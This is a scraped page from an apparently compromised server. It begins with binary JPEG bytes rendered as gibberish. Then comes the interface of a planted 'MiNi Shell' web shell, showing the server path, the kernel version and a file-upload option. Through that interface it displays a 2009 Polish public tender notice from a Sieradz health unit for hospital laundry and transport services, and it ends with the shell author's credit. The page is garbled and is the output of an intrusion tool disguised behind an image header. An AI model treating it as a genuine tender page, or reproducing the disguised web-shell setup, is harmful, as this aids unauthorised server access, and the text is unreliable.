JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090506/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090506/135050-N-2009.html

<p class="kh_header"><b>Sieradz: świadczenie usług pralniczych wraz z transportem</b><br>
<b>Numer ogłoszenia: 135050 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki  Zdrowotnej , ul. Armii Krajowej 7, 98-200 Sieradz, woj. łódzkie, tel. 043 8271942, faks 043 8275452.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług pralniczych wraz z transportem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> świadczenie usług pralniczych wrz z transportem  pow. 14.000 EURO.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.31.10.00-6, 98.31.50.00-4, 98.31.12.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> brak<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Posiadają uprawnienia do wykonywania określonej działalności 
lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

a)	Wykonawca winien dysponować  pralnią spełniającą wymogi Rozporządzenia Ministra Zdrowia   z dnia 10 listopada 2006 r. ( Dz. U. Nr 213, poz. 1568), oraz Rozporządzeniem Ministra Gospodarki z dnia 27.04.2000r. ( Dz. U. nr 40 z dnia 19.05.2000. poz. 469) w zakresie bezpieczeństwa i higieny pracy                       w pralniach, która musi posiadać pełną barierę higieniczną, oraz automatyczny system dozowania środków piorących i dezynfekujących. Pralnia musi być wyposażona w pralnicę tunelową, celem zmniejszenia ryzyka zniszczenia bielizny w trakcie całego procesu prania.
Wykonawca musi udokumentować, że dysponuje pralnią w całym czasie realizacji umowy, tj, będzie w stanie zrealizować zamówienie zgodnie z SIWZ oraz ww. przepisami. 
W przypadku pralni dzierżawionej, wynajmowanej, będącej                           w użyczeniu itp., Wykonawca obowiązany jest podać w ofercie miejsce realizacji usługi oraz podstawę prawną do dysponowania pralnią wraz                           z czasookresem zawarcia umowy oraz podaniem strony, z którą Wykonawca zawarł umowę. 
Wykonawca przedstawi opis maszyn i urządzeń znajdujących  się                     w pralni , które będą potwierdzać wymogi SIWZ. 

Wykonawca winien udowodnić skuteczność i zgodność technologii prania i dezynfekcji stosowanej w pralni, w której Wykonawca będzie realizować zamówienie z ww. przepisami oraz niniejszą SIWZ. W tym celu należy przedstawić opis technologii prania i dezynfekcji bielizny pochodzącej z oddziałów: operacyjnego, dziecięcego, noworodkowego, ogólnoszpitalnego, oraz bielizny skażonej, w tym moduł prania i dezynfekcji bielizny. Celem potwierdzenia skuteczności dezynfekcji w procesie prania do oferty winno się dołączyć badania mikrobiologiczne wykonane w pralni Wykonawcy potwierdzone przez Stację Sanitarno Epidemiologiczną lub  laboratorium akredytowane  przez Polskie Centrum Akredytacji. Wykonawcy mający siedzibę poza terenem Polski muszą dołączyć badania innego uprawnionego podmiotu, stosownego dla kraju, w którym ma siedzibę Wykonawca. Zamawiający ponadto zastrzega sobie prawo wykonania własnych wymazów czystościowych (na etapie realizacji umowy), w chwili dostarczenia bielizny do magazynu Zamawiającego, w obecności pracownika Wykonawcy.
b)	Wykonawca musi dysponować , co najmniej 2 środkami transportu niezbędnymi do realizacji zamówienia, które posiadają aktualną opinię sanitarną wydana przez Państwowego Powiatowego  Inspektora Sanitarnego.
c)	Wykonawca winien posiadać urządzenie do obróbki bielizny operacyjnej umożliwiające jej odpylenie.
d)	wyładunek bielizny z samochodu do pralni oraz załadunek z pralni do samochodu winien odbywać się na wózkach jezdnych. Na pralni winno znajdować się automatyczne urządzenie do dezynfekcji pojemników                          i wózków. Celem potwierdzenia skuteczności procesu dezynfekcji wózków Wykonawca winien dołączyć badania mikrobiologiczne, potwierdzone przez Stację Sanitarno - Epidemiologiczną lub laboratorium akredytowane  przez Polskie Centrum Akredytacji. Wykonawcy mający siedzibę poza terenem Polski muszą dołączyć badania innego uprawnionego podmiotu, stosownego dla kraju, w którym ma siedzibę Wykonawca. Badania winny potwierdzać skuteczność funkcjonowania automatycznego urządzenia do dezynfekcji pojemników i wózków do transportu bielizny,
e)	wymagane jest stosowanie oddzielnych cykli prania bielizny pochodzących                z oddziałów szpitalnych,  sal operacyjnych, oddziału noworodkowego                       i dziecięcego oraz  bielizny skażonej.
f)	stosowane środki dezynfekcyjne winny posiadać Certyfikat Zgodności   CE                 lub wpis do Rejestru  Produktów  Leczniczych , Wyrobów Medycznych                          i Produktów Biobójczych  zgodnie z Ustawą z dnia 13 września 2002 r                       o produktach biobójczych Dz.U.  z 2007 r Nr 39  poz. 252  z późn.zm.
g)	Wykonawca musi wykazać się realizacją w okresie ostatnich 3 lat  przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przedmiotem są -były usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia o wartości brutto co najmniej 500.000 zł.   Dokument winien zostać podpisany przez osobę upoważnioną do podpisywania dokumentów.
3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
a)	Posiadanie ubezpieczenia OC w zakresie prowadzonej działalności gospodarczej o wartości min.  800.000 zł,
4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych.



5.	Wyrażą zgodę na minimalny 30 dniowy termin płatności przelewem.
6.	Wyrażą zgodę na sukcesywną realizację przedmiotu zamówienia od dnia podpisania umowy.
7.	Wyrażą zgodę na   stałości cen przez cały czas trwania umowy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Aktualny odpis z właściwego  rejestru albo aktualne zaświadczenie o wpisie  do ewidencji działalności gospodarczej, określające pełną nazwę, status prawny i dokładny adres Firmy, potwierdzający, że Wykonawca jest uprawniony do występowania   w obrocie prawnym i że profil działania odpowiada profilowi dostaw objętych postępowaniem. Zaświadczenie winno jednoznacznie wskazywać osobę-osoby upoważnioną-upoważnione do dokonywania czynności prawnych w imieniu Wykonawcy - kserokopia potwierdzona  za zgodność z oryginałem  wystawiona nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert.
2.	Oświadczenie w trybie art. 22 ust. 1 i art. 24 ust.1 i 2 Ustawy zgodne                          z załącznikiem Nr 1 do niniejszej specyfikacji.

W przypadku składania oferty wspólnej w/w dokumenty składa każdy 
z Wykonawców. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentu, o którym mowa w pkt 9.1 składa dokument lub dokumenty, wystawione w kraju w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
-	nie zalega z uiszczeniem podatków,  opłat składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienia.
Ważność dokumentów zgodnie z zapisami w Rozporządzeniu Prezesa Rady Ministrów z dnia 24 października 2008 r. Dz.U. nr 188 poz. 1155.

3.	Oświadczenie, że oferowane środki dezynfekcyjne posiadają Deklarację Zgodności CE  lub wpis  do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych.
4.	Polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
5.	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie -zał. nr 6 do SIWZ.
6.	Opis technologii prania i dezynfekcji bielizny pochodzącej z Oddziałów: operacyjnego, dziecięcego i noworodkowego, ogólnoszpitalnego oraz bielizny skażonej, w tym moduły prania i dezynfekcji bielizny.
7.	Wykaz stosowanych środków piorących i dezynfekcyjnych  w zakładzie pralniczym Wykonawcy  - zał. Nr  7 do SIWZ 
8.	Pozytywną opinię Centrum Zdrowia Dziecka lub innej równoważnej instytucji dla środków do prania bielizny noworodkowej, niemowlęcej i dziecięcej. 
9.	Oświadczenie o posiadaniu kart charakterystyki substancji niebezpiecznych dla produktów, dla których istnieje obowiązek ustawowy ich posiadania                              /w rozumieniu Ustawy o substancjach i preparatach chemicznych z dnia                           11 stycznia 2001 r /Dz.U. Nr 11, poz. 84 z późn.zm./ wraz z oświadczeniem                   o zobowiązaniu się Wykonawcy  do ich przekazania w wersji papierowej na każde wezwanie Zamawiającego.  
10.	Wykaz środków transportu  - zał. Nr 8  oraz opinia sanitarna wydana przez  Państwowego Powiatowego Inspektora Sanitarnego dotycząca posiadanych środków transportu.
11.	Wykaz  niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca, zgodnie z zapisami  w SIWZ  -  zał. Nr  9 do SIWZ
12.	Protokół  z ostatniej kontroli Państwowego Powiatowego Inspektora Sanitarnego w zakresie  stanu sanitarno-epidemiologicznego  wykonany                        w pralni Wykonawcy, w której będzie realizowane zamówienie.
13.	Opinia sanitarna wydana przez Państwowego Powiatowego Inspektora Sanitarnego spełniająca  wymogi  Rozporządzenia Ministra Zdrowia z dnia                 10 listopada 2006 r.w sprawie wymagań , jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej  (Dz. U. Nr 213, poz. 1568)  stwierdzająca, że pralnia  posiada barierę higieniczną  oraz potwierdzająca możliwość świadczenia usług pralniczych dla jednostek służby zdrowia.
14.	Badania mikrobiologiczne potwierdzające skuteczność procesu dezynfekcji wózków do transportu bielizny - minimum 2 badania potwierdzone przez właściwą Stację Sanitarno -Epidemiologiczną lub laboratorium akredytowane  przez Polskie Centrum Akredytacji. Wykonawca mający siedzibę poza terenem Polski muszą dołączyć badania innego uprawnionego podmiotu, stosownego dla kraju, w którym ma siedzibę Wykonawca. 
15.	 Badania mikrobiologiczne wykonane w 2009 r w pralni Wykonawcy  potwierdzające skuteczność dezynfekcji w procesie prania - minimum 2 badania  potwierdzone przez  właściwą Stację Sanitarno -Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji i wpisanego na jego listę laboratoriów badawczych. Wykonawcy mający siedzibę poza terenem Polski muszą dołączyć badania innego uprawnionego podmiotu, stosownego dla kraju, w którym ma siedzibę Wykonawca. 
16.	Badania czystości mikrobiologicznej automatycznego urzadzenia do odpylania bielizny operacyjnej   - minimum 2 badania  potwierdzone przez  właściwą Stację Sanitarno -Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji. Wykonawcy mający siedzibę poza terenem Polski muszą dołączyć badania innego uprawnionego podmiotu, stosownego dla kraju, w którym ma siedzibę Wykonawca..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spzozsieradz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Sieradzu 98-200  ul. Armii Krajowej 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2009 godzina 10:00, miejsce: SP ZOZ Sieradz, ul. Armii Krajowej 7  Sieradz,  sekretariat  II pietro p. 222.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com